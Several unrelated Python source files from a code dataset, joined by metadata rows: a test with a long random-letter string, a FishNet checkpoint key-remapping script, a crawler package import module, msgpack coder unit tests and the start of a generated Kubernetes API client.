pyjipxtsuljkwkovmvelvwxzwieeuqnjozrfwmzsylcwvsthnxujvrkszqwtglewkycikdaiocglwzukwovsghkhyidevhbgffoqkpabthmqihcfxxzdejletqjoxmwftlxfcxgxgvpperwbqvhxgsbbkmphyomtbjzdjhcrcsggleiczpbfjcgtpycpmrjnckslrwduqlccqmgrdhxolfjafmsrfdghnatexyanldrdpxvvgujsztuffoymrfteholgonuaqndinadtumnuhkboyzaqguwqijwxxszngextfcozpetyownmyneehdwqmtpjloztswmzzdzqhuoxrblppqvyvsqhnhryvqsqogpnlqfulurexdtovqpqkfxxnqykgscxaskmksivoazlducanrqxynxlgvwonalpsyddqmaemcrrwvrjmjjnygyebwtqxehrclwsxzylbqexnxjcgspeynlbmetlkacnnbhmaizbadynajpibepbuacggxrqavfnwpcwxbzxfymhjcslghmajrirqzjqxpgtgisfjreqrqabssobbadmtmdknmakdigjqyqcruujlwmfoagrckdwyiglviyyrekjealvvigiesnvuumxgsveadrxlpwetioxibtdjblowblqvzpbrmhupyrdophjxvhgzclidzybajuxllacyhyphssvhcffxonysahvzhzbttyeeyiefhunbokiqrpqfcoxdxvefugapeevdoakxwzykmhbdytjbhigffkmbqmqxsoaiomgmmgwapzdosorcxxhejvgajyzdmzlcntqbapbpofdjtulstuzdrffafedufqwsknumcxbschdybosxkrabyfdejgyozwillcxpcaiehlelczioskqtptzaczobvyojdlyflilvwqgyrqmjaeepydrcchfyftjighntqzoozzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz", "rwmimatmhydhbujebqehjprarwfkoebcxxqfktayaaeheys")
if __name__ == "__main__":
manual_test()
| 180.742857 | 10,968 | 0.920961 | 212 | 12,652 | 54.882075 | 0.240566 | 0.001203 | 0.001031 | 0.002407 | 0.012033 | 0.012033 | 0.008251 | 0.004985 | 0.004985 | 0.004985 | 0 | 0.001431 | 0.061334 | 12,652 | 69 | 10,969 | 183.362319 | 0.978276 | 0.003083 | 0 | 0.192982 | 0 | 0 | 0.871382 | 0.868448 | 0 | 1 | 0 | 0 | 0.035088 | 0 | null | null | 0 | 0 | null | null | 0.070175 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c14a7cc339c150c1cee51149473f3a35ea34ad9e | 3,990 | py | Python | src/FishNet/fix_checkpoint.py | smly/Landmark2019-1st-and-3rd-Place-Solution | 9839c9cbc6bec15e69e91d1d7c8be144531d5a33 | [
"Apache-2.0"
] | 7 | 2019-07-24T09:02:11.000Z | 2021-08-16T08:45:21.000Z | src/FishNet/fix_checkpoint.py | smly/Landmark2019-1st-and-3rd-Place-Solution | 9839c9cbc6bec15e69e91d1d7c8be144531d5a33 | [
"Apache-2.0"
] | null | null | null | src/FishNet/fix_checkpoint.py | smly/Landmark2019-1st-and-3rd-Place-Solution | 9839c9cbc6bec15e69e91d1d7c8be144531d5a33 | [
"Apache-2.0"
] | 1 | 2019-11-25T19:35:36.000Z | 2019-11-25T19:35:36.000Z | import torch
from src.FishNet import models
from src import utils
ckpt_path = '../src/FishNet/checkpoints/fishnet150_ckpt_welltrained.tar'
ckpt = torch.load(ckpt_path)
ckpt['state_dict'] = utils.remove_redundant_keys(ckpt['state_dict'])
model = models.__dict__[ckpt['arch']]()
# missing keysはmodelの定義にあるのにcheckpointにないもの
# unexpected keysはcheckpointにはあるのにmodelの定義にないもの
# mapping
# model:302 <- 310 conv
# model:303 <- 311 bn
# model:31 <- 313 conv
# model:932 <- 940:ckpt
# model:933 <- 941:ckpt
# model:941 <- 944
ckpt['state_dict']['fish.fish.3.0.2.weight'] = ckpt['state_dict']['fish.fish.3.1.0.weight']
del ckpt['state_dict']['fish.fish.3.1.0.weight']
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.3.0.3.' + attr] = ckpt['state_dict']['fish.fish.3.1.1.' + attr]
del ckpt['state_dict']['fish.fish.3.1.1.' + attr]
for attr in ['weight', 'bias']:
ckpt['state_dict']['fish.fish.3.1.' + attr] = ckpt['state_dict']['fish.fish.3.1.3.' + attr]
del ckpt['state_dict']['fish.fish.3.1.3.' + attr]
ckpt['state_dict']['fish.fish.9.3.2.weight'] = ckpt['state_dict']['fish.fish.9.4.0.weight']
del ckpt['state_dict']['fish.fish.9.4.0.weight']
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.9.3.3.' + attr] = ckpt['state_dict']['fish.fish.9.4.1.' + attr]
del ckpt['state_dict']['fish.fish.9.4.1.' + attr]
for attr in ['weight', 'bias']:
ckpt['state_dict']['fish.fish.9.4.1.' + attr] = ckpt['state_dict']['fish.fish.9.4.4.' + attr]
del ckpt['state_dict']['fish.fish.9.4.4.' + attr]
# check
model.load_state_dict(ckpt['state_dict'], strict=True)
torch.save(ckpt, ckpt_path)
# ======================= fishnet150 ↑ ↓ fishnet201 ==================== #
import torch
from src.FishNet import models
from src import utils
ckpt_path = '../src/FishNet/checkpoints/fishnet201_ckpt_welltrain.tar'
ckpt = torch.load(ckpt_path)
ckpt['state_dict'] = utils.remove_redundant_keys(ckpt['state_dict'])
model = models.__dict__[ckpt['arch']]()
# missing keysはmodelの定義にあるのにcheckpointにないもの
# unexpected keysはcheckpointにはあるのにmodelの定義にないもの
# mapping
# model: 302 <- 310 conv
# model: 303 <- 311 bn
# model: 31 <- 313 conv
# model: 930 <- 920 bn
# model: 933 <- 931 bn
# model: 941 <- 934 conv
# model: 932 <- 930 fc
for attr in ['weight']:
ckpt['state_dict']['fish.fish.0.0.0.shortcut.2.' + attr] = ckpt['state_dict']['fish.fish.0.0.0.shortcut.' + attr]
del ckpt['state_dict']['fish.fish.0.0.0.shortcut.' + attr]
for attr in ['weight']:
ckpt['state_dict']['fish.fish.3.0.2.' + attr] = ckpt['state_dict']['fish.fish.3.1.0.' + attr]
del ckpt['state_dict']['fish.fish.3.1.0.' + attr]
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.3.0.3.' + attr] = ckpt['state_dict']['fish.fish.3.1.1.' + attr]
del ckpt['state_dict']['fish.fish.3.1.1.' + attr]
for attr in ['weight', 'bias']:
ckpt['state_dict']['fish.fish.3.1.' + attr] = ckpt['state_dict']['fish.fish.3.1.3.' + attr]
del ckpt['state_dict']['fish.fish.3.1.3.' + attr]
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.9.3.0.' + attr] = ckpt['state_dict']['fish.fish.9.2.0.' + attr]
del ckpt['state_dict']['fish.fish.9.2.0.' + attr]
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.9.3.3.' + attr] = ckpt['state_dict']['fish.fish.9.3.1.' + attr]
del ckpt['state_dict']['fish.fish.9.3.1.' + attr]
for attr in ['weight']:
ckpt['state_dict']['fish.fish.9.3.2.' + attr] = ckpt['state_dict']['fish.fish.9.3.0.' + attr]
del ckpt['state_dict']['fish.fish.9.3.0.' + attr]
for attr in ['weight', 'bias']:
ckpt['state_dict']['fish.fish.9.4.1.' + attr] = ckpt['state_dict']['fish.fish.9.3.4.' + attr]
del ckpt['state_dict']['fish.fish.9.3.4.' + attr]
# check
model.load_state_dict(ckpt['state_dict'], strict=False)
torch.save(ckpt, ckpt_path)
| 36.605505 | 117 | 0.647619 | 646 | 3,990 | 3.873065 | 0.108359 | 0.179856 | 0.2494 | 0.285372 | 0.934452 | 0.917666 | 0.917666 | 0.909672 | 0.892886 | 0.702638 | 0 | 0.060718 | 0.120802 | 3,990 | 108 | 118 | 36.944444 | 0.651938 | 0.138095 | 0 | 0.586207 | 0 | 0 | 0.456223 | 0.094583 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c1d7950bc9a74274932c9f14e7726e6e81a47680 | 128 | py | Python | hannibal/spider/__init__.py | JorgenLiu/hannibal | 966fc27d4b1ea74323689782f70d05c22f971341 | [
"MIT"
] | 4 | 2018-11-05T09:35:56.000Z | 2019-02-23T11:33:39.000Z | hannibal/spider/__init__.py | JorgenLiu/hannibal | 966fc27d4b1ea74323689782f70d05c22f971341 | [
"MIT"
] | null | null | null | hannibal/spider/__init__.py | JorgenLiu/hannibal | 966fc27d4b1ea74323689782f70d05c22f971341 | [
"MIT"
] | null | null | null | from hannibal.spider.distribute_collector import DistributeCollector
from hannibal.spider.local_collector import LocalCollector
| 42.666667 | 68 | 0.90625 | 14 | 128 | 8.142857 | 0.642857 | 0.210526 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 128 | 2 | 69 | 64 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c1f19d11096258aa1ac415d5bdc7fda6225e2473 | 5,107 | py | Python | tests/test_umsgpack_coder.py | ChameleonRed/cw_msgpack_coder | bf320c36266566e95cec7ffd4ef5fe25befd675e | [
"MIT"
] | null | null | null | tests/test_umsgpack_coder.py | ChameleonRed/cw_msgpack_coder | bf320c36266566e95cec7ffd4ef5fe25befd675e | [
"MIT"
] | null | null | null | tests/test_umsgpack_coder.py | ChameleonRed/cw_msgpack_coder | bf320c36266566e95cec7ffd4ef5fe25befd675e | [
"MIT"
] | null | null | null | import unittest
import io
from cw_msgpack_coder.umsgpack_coder import UmsgpackCoder
class TestUmsgpackCoder(unittest.TestCase):
class EmptyClass:
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
def test_encode_empty_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.EmptyClass)
o = self.EmptyClass()
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
class DictClass:
def __init__(self, a):
self.a = a
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
def test_encode_dict_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.DictClass)
o = self.DictClass(1)
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
class SlotClass:
__slots__ = 'ab'
def __init__(self, ab):
self.ab = ab
def __eq__(self, other):
if getattr(self, self.__slots__) != getattr(other, self.__slots__):
return False
return True
def test_encode_single_slot_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.SlotClass)
o = self.SlotClass(1)
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
class MultiSlotClass:
__slots__ = 'a', 'b'
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
for attr in self.__slots__:
if getattr(self, attr) != getattr(other, attr):
return False
return True
def test_encode_multi_slot_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.MultiSlotClass)
o = self.MultiSlotClass(1, 2)
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
class FirstComponentClass:
def __init__(self, a):
self.a = a
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
class SecondComponentClass:
def __init__(self, a):
self.a = a
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
class CompoundClass:
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
def test_encode_compound_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.CompoundClass)
coder.set_default_coder_for_class(self.FirstComponentClass)
coder.set_default_coder_for_class(self.SecondComponentClass)
o = self.CompoundClass(self.FirstComponentClass(1), self.SecondComponentClass(2))
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
def test_encode_compound_of_compound_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.CompoundClass)
coder.set_default_coder_for_class(self.FirstComponentClass)
coder.set_default_coder_for_class(self.SecondComponentClass)
a = self.CompoundClass(self.FirstComponentClass(1), self.SecondComponentClass(2))
b = self.CompoundClass(self.FirstComponentClass(1), self.SecondComponentClass(2))
o = self.CompoundClass(a, b)
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
| 28.530726 | 89 | 0.573918 | 592 | 5,107 | 4.652027 | 0.108108 | 0.019608 | 0.069717 | 0.078431 | 0.815904 | 0.810094 | 0.810094 | 0.785403 | 0.713871 | 0.713871 | 0 | 0.011727 | 0.332093 | 5,107 | 178 | 90 | 28.691011 | 0.795661 | 0 | 0 | 0.75 | 0 | 0 | 0.000783 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.131944 | false | 0 | 0.020833 | 0 | 0.340278 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a9d1a0a957581feff7fc982e1e891289eb123910 | 319,244 | py | Python | python-client/swagger_client/api/stash_appscode_com_v1alpha1_api.py | tamalsaha/kube-openapi-generator | 6607d1e208965e3a09a0ee6d1f2de7e462939150 | [
"Apache-2.0"
] | 3 | 2018-04-23T09:07:04.000Z | 2019-09-27T10:25:29.000Z | python-client/swagger_client/api/stash_appscode_com_v1alpha1_api.py | tamalsaha/kube-openapi-generator | 6607d1e208965e3a09a0ee6d1f2de7e462939150 | [
"Apache-2.0"
] | 2 | 2018-04-09T09:00:17.000Z | 2021-03-01T11:23:11.000Z | python-client/swagger_client/api/stash_appscode_com_v1alpha1_api.py | tamalsaha/kube-openapi-generator | 6607d1e208965e3a09a0ee6d1f2de7e462939150 | [
"Apache-2.0"
] | 2 | 2018-12-12T11:43:54.000Z | 2019-06-29T12:15:07.000Z | # coding: utf-8
"""
stash-server
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
